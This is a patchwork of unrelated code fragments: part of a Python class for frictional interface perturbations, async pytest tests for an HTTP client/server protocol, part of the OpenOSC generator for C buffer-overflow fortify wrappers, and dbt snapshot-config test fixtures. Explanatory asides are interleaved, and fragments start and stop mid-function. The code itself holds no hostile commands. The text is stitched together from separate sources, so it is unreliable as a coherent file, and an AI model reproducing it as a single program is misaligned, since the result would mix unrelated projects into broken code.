assert type(index) is int and index >= 0 and index < self.nifaces, "Must give integer index for interface"
self.interfaces[index].add_pert(newpert)
def delete_pert(self, niface, index = -1):
"""
Deletes frictional parameter perturbation from interface
``niface`` is an integer indicating the index of the desired interface. If out of bounds, will
give an error.
``index`` is an integer that indicates the position within the list of loads. Default is most
recently added (-1).
:param niface: Index of interface from which to remove the parameter perturbation
:type niface: int
:param index: Index within perturbation list of the given interface to remove. Default is
last item (-1, or most recently added)
:type index: int
:returns: None
"""
assert type(niface) is int and niface >= 0 and niface < self.nifaces, "Must give integer index for interface"
self.interfaces[niface].delete_pert(index)
def get_pert(self, niface, index = None):
"""
Returns perturbation for index | |
\
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(
HttpRequestMethod.POST, uri="/", headers={"content-type": "1"}
)
writer.write(os.urandom(1))
await writer.flush()
writer.finish()
protocol.data_received(
b"HTTP/1.1 200 OK\r\nTransfer-Encoding: Chunked\r\n\r\n"
)
reader = await writer.read_response()
protocol.connection_lost(None)
assert transport_mock._closing is True
with pytest.raises(ReadAbortedError):
await reader.read()
@helper.run_async_test
async def test_local_abort_1(self):
"""
HttpClientProtocol.write_request() -x-> \
[HttpRequestWriter.write(), HttpRequestWriter.flush()] -> \
HttpRequestWriter.finish() -> \
HttpRequestWriter.read_response() -> \
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(HttpRequestMethod.GET, uri="/")
writer.abort()
assert transport_mock._closing is True
with pytest.raises(WriteAbortedError):
await writer.flush()
with pytest.raises(WriteAbortedError):
writer.finish()
with pytest.raises(ReadAbortedError):
await writer.read_response()
@helper.run_async_test
async def test_local_abort_2(self):
"""
HttpClientProtocol.write_request() -> \
[HttpRequestWriter.write(), HttpRequestWriter.flush()] -x-> \
HttpRequestWriter.finish() -> \
HttpRequestWriter.read_response() -> \
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(
HttpRequestMethod.POST, uri="/", headers={"content-type": "1"}
)
writer.write(os.urandom(1))
await writer.flush()
writer.abort()
assert transport_mock._closing is True
with pytest.raises(WriteAbortedError):
writer.finish()
with pytest.raises(ReadAbortedError):
await writer.read_response()
@helper.run_async_test
async def test_local_abort_3(self):
"""
HttpClientProtocol.write_request() -> \
[HttpRequestWriter.write(), HttpRequestWriter.flush()] -> \
HttpRequestWriter.finish() -x-> \
HttpRequestWriter.read_response() -> \
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(
HttpRequestMethod.POST, uri="/", headers={"content-type": "1"}
)
writer.write(os.urandom(1))
await writer.flush()
writer.finish()
protocol.data_received(
b"HTTP/1.1 200 OK\r\nTransfer-Encoding: Chunked\r\n\r"
)
writer.abort()
assert transport_mock._closing is True
with pytest.raises(ReadAbortedError):
await writer.read_response()
@helper.run_async_test
async def test_local_abort_4(self):
"""
HttpClientProtocol.write_request() -> \
[HttpRequestWriter.write(), HttpRequestWriter.flush()] -> \
HttpRequestWriter.finish() -> \
HttpRequestWriter.read_response() -x-> \
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(
HttpRequestMethod.POST, uri="/", headers={"content-type": "1"}
)
writer.write(os.urandom(1))
await writer.flush()
writer.finish()
protocol.data_received(
b"HTTP/1.1 200 OK\r\nTransfer-Encoding: Chunked\r\n\r\n"
)
reader = await writer.read_response()
writer.abort()
assert transport_mock._closing is True
with pytest.raises(ReadAbortedError):
await reader.read()
@helper.run_async_test
async def test_endless_response_cutoff(self):
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(b"HTTP/1.0 200 OK\r\n\r\n")
writer = await protocol.write_request(HttpRequestMethod.GET, uri="/")
writer.finish()
reader = await writer.read_response()
for _ in range(0, 5):
data = os.urandom(1024)
protocol.data_received(data)
assert await reader.read(4096) == data
transport_mock._closing = True
protocol.connection_lost(OSError())
with pytest.raises(ReadAbortedError):
await reader.read()
@helper.run_async_test
async def test_http11_100continue_response(self):
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"HTTP/1.1 100 Continue\r\n\r\n"
b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\n12345"
)
writer = await protocol.write_request(HttpRequestMethod.GET, uri="/")
writer.finish()
reader = await writer.read_response()
assert await reader.read() == b"12345"
assert reader.initial.status_code == 200
assert reader.initial.headers == {"content-length": "5"}
assert protocol.eof_received() is True
protocol.connection_lost(None)
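The ``TransportMock`` used throughout these tests is not defined in this excerpt; a minimal stand-in that satisfies the attributes the assertions rely on (``_closing``, ``_data_chunks``, ``_pop_stored_data()``) might look like the following. This is an assumption for illustration, not the project's actual helper:

```python
class TransportMock:
    """Collects written bytes instead of sending them over a socket."""

    def __init__(self):
        self._closing = False
        self._data_chunks = []

    def write(self, data):
        self._data_chunks.append(bytes(data))

    def close(self):
        self._closing = True

    def _pop_stored_data(self):
        # Return everything written so far and reset the buffer.
        data = b"".join(self._data_chunks)
        self._data_chunks.clear()
        return data

t = TransportMock()
t.write(b"HTTP/1.1 200 OK\r\n\r\n")
assert t._pop_stored_data() == b"HTTP/1.1 200 OK\r\n\r\n"
t.close()
```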
class HttpServerProtocolTestCase:
def test_init(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
transport_mock._closing = True
protocol.connection_lost(None)
@helper.run_async_test
async def test_simple_request(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
async def aiter_requests():
count = 0
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
writer.finish()
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(b"GET / HTTP/1.1\r\nConnection: Close\r\n\r\n")
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
data = transport_mock._pop_stored_data()
helper.assert_initial_bytes(
data,
b"HTTP/1.1 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
b"Transfer-Encoding: Chunked",
)
assert data.split(b"\r\n\r\n", 1)[1] == b"0\r\n\r\n"
@helper.run_async_test
async def test_simple_request_10(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
async def aiter_requests():
count = 0
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
writer.finish()
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(b"GET / HTTP/1.0\r\n\r\n")
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.0 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
)
@helper.run_async_test
async def test_chunked_request(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
async def aiter_requests():
count = 0
async for reader in protocol:
assert await reader.read(9, exactly=True) == b"123456789"
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
writer.finish()
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(
b"GET / HTTP/1.1\r\nTransfer-Encoding: Chunked\r\n"
b"Connection: Close\r\n\r\n"
b"5\r\n12345\r\n4\r\n6789\r\n0\r\n\r\n"
)
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
data = transport_mock._pop_stored_data()
helper.assert_initial_bytes(
data,
b"HTTP/1.1 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
b"Transfer-Encoding: Chunked",
)
assert data.split(b"\r\n\r\n", 1)[1] == b"0\r\n\r\n"
@helper.run_async_test
async def test_simple_response_with_chunked_body(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
data = os.urandom(20)
async def aiter_requests():
count = 0
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
writer.finish(data)
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(b"GET / HTTP/1.1\r\nConnection: Close\r\n\r\n")
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
final_data = transport_mock._pop_stored_data()
helper.assert_initial_bytes(
final_data,
b"HTTP/1.1 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
b"Transfer-Encoding: Chunked",
)
assert (
final_data.split(b"\r\n\r\n", 1)[1]
== b"14\r\n" + data + b"\r\n0\r\n\r\n"
)
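The assertions above check HTTP/1.1 chunked framing by hand: each chunk is its length in hex, CRLF, the payload, CRLF, and the body ends with a zero-length chunk (``0\r\n\r\n``). A small encoder reproducing that wire format (a sketch, not the library's writer):

```python
def encode_chunk(payload: bytes) -> bytes:
    # <hex length>\r\n<payload>\r\n
    return ("%x" % len(payload)).encode("ascii") + b"\r\n" + payload + b"\r\n"

def finish_chunked() -> bytes:
    # Zero-length chunk terminates the body.
    return b"0\r\n\r\n"

body = encode_chunk(b"x" * 20) + finish_chunked()
assert body.startswith(b"14\r\n")   # 20 bytes == 0x14
assert body.endswith(b"0\r\n\r\n")
```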
@helper.run_async_test
async def test_simple_response_with_content_length(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
data = os.urandom(20)
async def aiter_requests():
count = 0
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(
HttpStatusCode.OK, headers={"content-length": "20"}
)
writer.finish(data)
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(b"GET / HTTP/1.1\r\nConnection: Close\r\n\r\n")
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
final_data = transport_mock._pop_stored_data()
helper.assert_initial_bytes(
final_data,
b"HTTP/1.1 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
b"Content-Length: 20",
)
assert final_data.split(b"\r\n\r\n", 1)[1] == data
@helper.run_async_test
async def test_keep_alive(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.1\r\n\r\n" b"GET / HTTP/1.1\r\n\r\n"
)
async def aiter_requests():
count = 0
async for reader in protocol:
assert reader.initial.uri == "/"
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.NO_CONTENT)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.1 204 No Content",
b"Server: %(self_ver_bytes)s",
)
writer.finish()
assert b"".join(transport_mock._data_chunks) == b""
count += 1
assert count == 2
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
if tsk.done():
raise RuntimeError(tsk.result())
assert protocol.eof_received() is True
await tsk
transport_mock._closing = True
protocol.connection_lost(None)
with pytest.raises(StopAsyncIteration):
await protocol.__aiter__().__anext__()
@helper.run_async_test
async def test_keep_alive_10(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.0\r\nConnection: Keep-Alive\r\n\r\n"
b"GET / HTTP/1.0\r\nConnection: Keep-Alive\r\n\r\n"
)
async def aiter_requests():
count = 0
async for reader in protocol:
assert reader.initial.uri == "/"
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.NO_CONTENT)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.0 204 No Content",
b"Connection: Keep-Alive",
b"Server: %(self_ver_bytes)s",
)
writer.finish()
assert b"".join(transport_mock._data_chunks) == b""
count += 1
assert count == 2
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
if tsk.done():
raise RuntimeError(tsk.result())
assert protocol.eof_received() is True
await tsk
transport_mock._closing = True
protocol.connection_lost(None)
with pytest.raises(StopAsyncIteration):
await protocol.__aiter__().__anext__()
@helper.run_async_test
async def test_response_with_endless_body(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(b"GET / HTTP/1.0\r\n\r\n")
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.0 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
)
for _ in range(0, 5):
data = os.urandom(1024)
writer.write(data)
assert b"".join(transport_mock._data_chunks) == data
transport_mock._data_chunks.clear()
writer.finish()
assert b"".join(transport_mock._data_chunks) == b""
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
@helper.run_async_test
async def test_upgrade(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.1\r\nConnection: Upgrade\r\n"
b"Upgrade: WebSocket\r\n\r\n"
)
count = 0
async for reader in protocol:
count += 1
assert reader.initial.headers["connection"] == "Upgrade"
assert reader.initial.headers["upgrade"] == "WebSocket"
writer = reader.write_response(
HttpStatusCode.SWITCHING_PROTOCOLS,
headers={"Connection": "Upgrade", "Upgrade": "WebSocket"},
)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.1 101 Switching Protocols",
b"Server: %(self_ver_bytes)s",
b"Upgrade: WebSocket",
b"Connection: Upgrade",
)
for _i in range(0, 5):
for _j in range(0, 5):
data = os.urandom(1024)
protocol.data_received(data)
assert await reader.read(4096) == data
for _k in range(0, 5):
data = os.urandom(1024)
writer.write(data)
assert b"".join(transport_mock._data_chunks) == data
transport_mock._data_chunks.clear()
writer.finish()
assert protocol.eof_received() is True
with pytest.raises(ReadFinishedError):
await reader.read()
transport_mock.close()
protocol.connection_lost(None)
assert count == 1
@helper.run_async_test
async def test_close_after_finished(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.1\r\nConnection: Keep-Alive\r\n\r\n"
)
count = 0
async for reader in protocol:
count += 1
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(
HttpStatusCode.NO_CONTENT, headers={"connection": "Keep-Alive"}
)
writer.finish()
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.1 204 No Content",
b"Server: %(self_ver_bytes)s",
b"Connection: Keep-Alive",
)
protocol.close()
assert transport_mock._closing is True
assert protocol.eof_received() is True
protocol.connection_lost(None)
assert count == 1
@helper.run_async_test
async def test_close_before_finished(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.1\r\nConnection: Keep-Alive\r\n\r\n"
)
async def wait_closed():
await protocol.wait_closed()
count = 0
async for reader in protocol:
count += 1
protocol.close()
tsk = helper.create_task(wait_closed())
await asyncio.sleep(0)
assert tsk.done() is False
assert transport_mock._closing is False
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(
HttpStatusCode.NO_CONTENT, headers={"connection": "Keep-Alive"}
)
writer.finish()
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.1 204 No Content",
b"Server: %(self_ver_bytes)s",
b"Connection: Keep-Alive",
)
assert count == 1
assert transport_mock._closing is True
assert protocol.eof_received() is True
assert tsk.done() is False
protocol.connection_lost(None)
await tsk
| |
+ ')'
like_which = "like_memcpy"
code2 = todo_code_template
if dest_param:
if copylen:
code += '\n{\n'
code += ' unsigned int osc_abort = OSC_DEF_ABORT_STATE;\n\n'
code += ' if (' + copylen + ' > dest_len) {\n'
code += ' if (osc_log) {\n'
code += ' danger_error("' + funcname + '", dest_len, ' + copylen + ');\n'
code += ' }\n'
code += ' osc_get_config(&osc_abort);\n'
code += ' if (osc_abort) {\n'
code += ' abort();\n'
code += ' }\n'
code += ' if (osc_truncate) {\n'
code += ' ' + copylen + ' = dest_len;\n'
code += ' }\n'
code += ' }\n'
#code += '#undef ' + funcname + '\n'
#code += ' return (' + funcname + '(' + comma_params + '));\n'
#code += '}\n\n'
else:
code += code2
else:
code += code2
if dest_param:
if copylen and src_param:
like_which = "like_memcpy"
#code2 = generate_code_like_memcpy(funcname, copylen)
elif copylen and not src_param:
like_which = "like_memset"
#code2 = generate_code_like_memset(funcname, copylen)
elif not copylen and src_param:
like_which = "like_strcpy"
else:
like_which = "like_dest_only"
else:
like_which = "like_other"
if src_param and copylen:
like_which = "like_strnlen"
elif "print" in funcname:
like_which = "vprintf_like"
#code += code2
## Add support for calling glibc print_chk functions
if glibc_chk_funcname in glibc_print_chk_prototype_db:
glibc_chk_prototype = glibc_print_chk_prototype_db[glibc_chk_funcname]
(glibc_retval, glibc_funcname, glibc_params) = get_func_params_from_prototype(glibc_chk_prototype)
flag_index = find_flag_param_index_in_params(glibc_params)
new_comma_params = insert_glibc_print_chk_flag_with_destlen(params, flag_index)
code += '\n return (' + glibc_funcname + '(' + new_comma_params + '));\n}\n\n'
else:
code += '\n return (' + funcname + '(' + comma_params + '));\n}\n\n'
print(code)
openosc_write_filename("openosc_fortify_map.c", code)
print(HDR2)
return like_which
def openosc_write_filename(filename, code, position=''):
'''
Write generated code to a file. It appends to the end of the file, so writing order is important.
:param filename: the file name to write the code.
:param code: the code as a long string.
:param position: file_start/file_end
:returns None
'''
if not filename:
return
with open(filename, 'a') as f:
if position == "file_start":
f.write( get_openosc_h_file_top_code(filename) )
f.write(code + '\n')
if position == "file_end":
f.write( get_openosc_h_file_bottom_code(filename) )
def openosc_write_file(afile, code, filename='', position=''):
if afile:
if filename and position == "file_start":
afile.write('\n/* Beginning of ' + filename + ' */\n\n')
afile.write( get_openosc_h_file_top_code(filename) )
afile.write(code + "\n")
if filename and position == "file_end":
afile.write( get_openosc_h_file_bottom_code(filename) )
afile.write('\n/* End of ' + filename + ' */\n\n')
########## Function Prototype Analysis Functions ###########
memcpy_prototype = 'void *memcpy(void *dest, const void *src, size_t n);'
strncpy_prototype = 'char *strncpy(char *dest, const char *src, size_t n);'
vsnprintf_prototype = 'int vsnprintf(char *str, size_t size, const char *format, va_list ap);'
swprintf_prototype = '''int swprintf(wchar_t *wcs, size_t maxlen,
const wchar_t *format, ...);'''
def get_func_name_from_prototype(prototype):
'''
Get the function name from a function prototype string.
:param prototype: function prototype string
:returns the function name.
'''
loc1 = prototype.find('(')
newproto = prototype[:loc1].rstrip()
loc = newproto.rfind('*')
if loc < 0:
loc = newproto.rfind(' ')
funcname = newproto[(loc + 1):].strip()
return funcname
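As a quick check of the name-extraction rule (take everything after the last ``*`` or space before the opening parenthesis), here is a standalone restatement with usage examples:

```python
def func_name_from_prototype(prototype):
    head = prototype[:prototype.find('(')].rstrip()
    # The name starts after the last '*' (pointer return type) or space.
    loc = head.rfind('*')
    if loc < 0:
        loc = head.rfind(' ')
    return head[loc + 1:].strip()

assert func_name_from_prototype('void *memcpy(void *d, const void *s, size_t n);') == 'memcpy'
assert func_name_from_prototype('int vsnprintf(char *str, size_t size, const char *fmt, va_list ap);') == 'vsnprintf'
```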
def get_func_params_from_prototype(prototype):
'''
Get the whole string of function parameters from a function prototype string.
:param prototype: function prototype string
:returns the whole string of function parameters like "void *dest, const void *src, size_t n" for memcpy.
'''
loc1 = prototype.find('(')
loc2 = prototype.find(')')
params = prototype[(loc1 +1):loc2]
newproto = prototype[:loc1].rstrip()
loc = newproto.rfind('*')
if loc < 0:
loc = newproto.rfind(' ')
funcname = newproto[(loc + 1):].strip()
retval = newproto[:(loc + 1)]
#print((retval, funcname, params))
return (retval, funcname, params)
def get_param_list_from_params_string(params):
'''
Convert the string of function parameters to a list of "param_type param_name".
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns a list like ["void *dest", "const void *src", "size_t n"].
'''
tokens = params.split(",")
return [token.strip() for token in tokens]
def get_type_name_from_param(param):
'''
Return (param_type, param_name) tuple for a single function parameter string of "type name".
'''
param = param.strip()
loc = param.rfind('*')
if loc < 0:
loc = param.rfind(' ')
param_type = param[:(loc + 1)].strip()
param_name = param[(loc + 1):].strip()
return (param_type, param_name)
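The split-at-last-``*``-or-space rule above handles C declarations where the ``*`` binds to the name rather than the type; a self-contained sketch of the same logic:

```python
def split_type_name(param):
    param = param.strip()
    loc = param.rfind('*')
    if loc < 0:
        loc = param.rfind(' ')
    return param[:loc + 1].strip(), param[loc + 1:].strip()

assert split_type_name('const void *src') == ('const void *', 'src')
assert split_type_name('size_t n') == ('size_t', 'n')
```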
def get_param_names_from_params(params):
'''
Convert the string of function parameters to a list of parameter names only.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns a list like ["dest", "src", "n"].
'''
names = []
param_list = get_param_list_from_params_string(params)
for param in param_list:
(param_type, param_name) = get_type_name_from_param(param)
names.append(param_name)
return names
def get_comma_joined_param_names(params):
'''
Convert the string of function parameters to a new string of comma-joined parameter names only.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns a new string like "dest, src, n" for memcpy.
'''
names = get_param_names_from_params(params)
return ', '.join(names)
def analyze_func_params(params):
'''
Analyze the string of function parameters and find (dest, src, copylen) parameters.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns the tuple of (dest_type, dest_param, len_param, src_type, src_param)
'''
(dest_type, dest_param) = get_dest_param(params)
(src_type, src_param) = get_src_param(params)
len_param = get_copylen_param(params)
#print("Dest param type: " + dest_type + "Dest param: " + dest_param + " Length: " + len_param + " Src param type: " + src_type + " Src param: " + src_param)
if src_param == dest_param:
src_param = ""
src_type = ""
return (dest_type, dest_param, len_param, src_type, src_param)
def get_copylen_param(params):
'''
Find the copy length param from the string of function parameters.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns the copy length parameter like n for memcpy.
'''
token_list = []
tokens = params.split(',')
for token in tokens:
token = token.strip()
#print(token)
if token == "...":
continue
(param_type, param_name) = get_type_name_from_param(token)
if '*' in param_type or "const " in param_type or "[]" in param_name:
continue
if param_name == "n" or param_name == "len":
return param_name
if "size" in param_type or "size" == param_name:
token_list.append(token)
#print("All the candidate parameters for copy length or buffer size are:")
#print(token_list)
if token_list:
(param_type, param_name) = get_type_name_from_param(token_list[0])
return param_name
return ""
def get_dest_param(params):
'''
Find the destination buffer param from the string of function parameters.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns (dest_param_type, dest_param_name) like ("void *", "dest")
'''
token_list = []
tokens = params.split(',')
for token in tokens:
token = token.strip()
#print(token)
if token == "...":
continue
(param_type, param_name) = get_type_name_from_param(token)
if '*' not in param_type or "const " in param_type or "src" in param_name or "FILE" in param_type or "**" in param_type:
continue
if param_name == "dest" or param_name == "dst" or param_name == "destination":
return (param_type, param_name)
token_list.append(token)
#print("All the candidate parameters for destinationn param are:")
#print(token_list)
if token_list:
(param_type, param_name) = get_type_name_from_param(token_list[0])
return (param_type, param_name)
return ("", "")
def get_src_param(params):
'''
Find the source buffer param from the string of function parameters.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns (src_param_type, src_param_name) like ("const void *", "src")
'''
token_list = []
tokens = params.split(',')
for token in tokens:
token = token.strip()
#print(token)
if token == "...":
continue
(param_type, param_name) = get_type_name_from_param(token)
if '*' not in param_type or "format" in param_name or "dest" in param_name or "dst" in param_name or "FILE" in param_type:
continue
if param_name == "src" or param_name == "source":
return (param_type, param_name)
token_list.append(token)
#print("All the candidate parameters for source param are:")
#print(token_list)
if token_list:
(param_type, param_name) = get_type_name_from_param(token_list[0])
return (param_type, param_name)
return ("", "")
def get_man_section_func_output(func, section):
'''
Return output of "man <section> func" command.
:param func: function name
:param section: which section to search for manual
:returns the command output as a string.
'''
cmd = 'man ' + section + ' ' + func + ' | cat '
# print(cmd)
output = subprocess.check_output(cmd, shell=True, stderr=open(os.devnull, 'w'))
#print(output)
#files = output.splitlines()
return output
def get_man_func_output(func):
'''
Return output of "man 2 func" or "man 3 func".
:param func: function name
:returns the command output as a string.
'''
output = get_man_section_func_output(func, "2")
if output:
return output
return get_man_section_func_output(func, "3")
def | |
'quoting': {},
'tags': [],
'vars': {},
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'extra': 'even more',
'strategy': 'check',
'check_cols': ['a', 'b'],
}
@pytest.fixture
def complex_set_snapshot_config_object():
cfg = CheckSnapshotConfig(
column_types={'a': 'text'},
materialized='snapshot',
post_hook=[Hook(sql='insert into blah(a, b) select "1", 1')],
strategy=SnapshotStrategy.Check,
check_cols=['a', 'b'],
target_database='some_snapshot_db',
target_schema='some_snapshot_schema',
unique_key='id',
)
cfg._extra['extra'] = 'even more'
return cfg
def test_basic_snapshot_config(basic_check_snapshot_config_dict, basic_check_snapshot_config_object):
cfg_dict = basic_check_snapshot_config_dict
cfg = basic_check_snapshot_config_object
assert_symmetric(cfg, cfg_dict, CheckSnapshotConfig)
pickle.loads(pickle.dumps(cfg))
def test_complex_snapshot_config(complex_set_snapshot_config_dict, complex_set_snapshot_config_object):
cfg_dict = complex_set_snapshot_config_dict
cfg = complex_set_snapshot_config_object
assert_symmetric(cfg, cfg_dict)
pickle.loads(pickle.dumps(cfg))
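`assert_symmetric` checks a dict-to-object-to-dict round trip. The idea in miniature, using a plain dataclass as a hypothetical stand-in for dbt's config contracts:

```python
import dataclasses

@dataclasses.dataclass
class Cfg:
    # Simplified stand-in for a config contract with two fields.
    strategy: str
    check_cols: list

def to_dict(obj):
    return dataclasses.asdict(obj)

def from_dict(cls, d):
    return cls(**d)

cfg = Cfg(strategy='check', check_cols=['a', 'b'])
d = to_dict(cfg)
# Symmetry: serializing then parsing recovers the object, and vice versa.
assert from_dict(Cfg, d) == cfg
assert to_dict(from_dict(Cfg, d)) == d
```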
def test_invalid_check_wrong_strategy(basic_check_snapshot_config_dict):
wrong_strategy = basic_check_snapshot_config_dict
wrong_strategy['strategy'] = 'timestamp'
assert_fails_validation(wrong_strategy, CheckSnapshotConfig)
def test_invalid_missing_check_cols(basic_check_snapshot_config_dict):
wrong_fields = basic_check_snapshot_config_dict
del wrong_fields['check_cols']
with pytest.raises(ValidationError, match=r"'check_cols' is a required property"):
CheckSnapshotConfig.from_dict(wrong_fields)
def test_invalid_check_value(basic_check_snapshot_config_dict):
invalid_check_type = basic_check_snapshot_config_dict
invalid_check_type['check_cols'] = 'some'
assert_fails_validation(invalid_check_type, CheckSnapshotConfig)
@pytest.fixture
def basic_timestamp_snapshot_dict():
return {
'name': 'foo',
'root_path': '/root/',
'resource_type': str(NodeType.Snapshot),
'path': '/root/x/path.sql',
'original_file_path': '/root/path.sql',
'package_name': 'test',
'raw_sql': 'select * from wherever',
'unique_id': 'model.test.foo',
'fqn': ['test', 'models', 'foo'],
'refs': [],
'sources': [],
'depends_on': {'macros': [], 'nodes': []},
'deferred': False,
'database': 'test_db',
'description': '',
'schema': 'test_schema',
'alias': 'bar',
'tags': [],
'config': {
'column_types': {},
'enabled': True,
'materialized': 'snapshot',
'persist_docs': {},
'post-hook': [],
'pre-hook': [],
'quoting': {},
'tags': [],
'vars': {},
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'timestamp',
'updated_at': 'last_update',
},
'docs': {'show': True},
'columns': {},
'meta': {},
'checksum': {'name': 'sha256', 'checksum': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'},
'unrendered_config': {
'strategy': 'timestamp',
'unique_key': 'id',
'updated_at': 'last_update',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
},
}
@pytest.fixture
def basic_timestamp_snapshot_object():
return ParsedSnapshotNode(
package_name='test',
root_path='/root/',
path='/root/x/path.sql',
original_file_path='/root/path.sql',
raw_sql='select * from wherever',
name='foo',
resource_type=NodeType.Snapshot,
unique_id='model.test.foo',
fqn=['test', 'models', 'foo'],
refs=[],
sources=[],
depends_on=DependsOn(),
description='',
database='test_db',
schema='test_schema',
alias='bar',
tags=[],
config=TimestampSnapshotConfig(
strategy=SnapshotStrategy.Timestamp,
unique_key='id',
updated_at='last_update',
target_database='some_snapshot_db',
target_schema='some_snapshot_schema',
),
checksum=FileHash.from_contents(''),
unrendered_config={
'strategy': 'timestamp',
'unique_key': 'id',
'updated_at': 'last_update',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
},
)
@pytest.fixture
def basic_intermediate_timestamp_snapshot_object():
cfg = EmptySnapshotConfig()
cfg._extra.update({
'strategy': 'timestamp',
'unique_key': 'id',
'updated_at': 'last_update',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
})
return IntermediateSnapshotNode(
package_name='test',
root_path='/root/',
path='/root/x/path.sql',
original_file_path='/root/path.sql',
raw_sql='select * from wherever',
name='foo',
resource_type=NodeType.Snapshot,
unique_id='model.test.foo',
fqn=['test', 'models', 'foo'],
refs=[],
sources=[],
depends_on=DependsOn(),
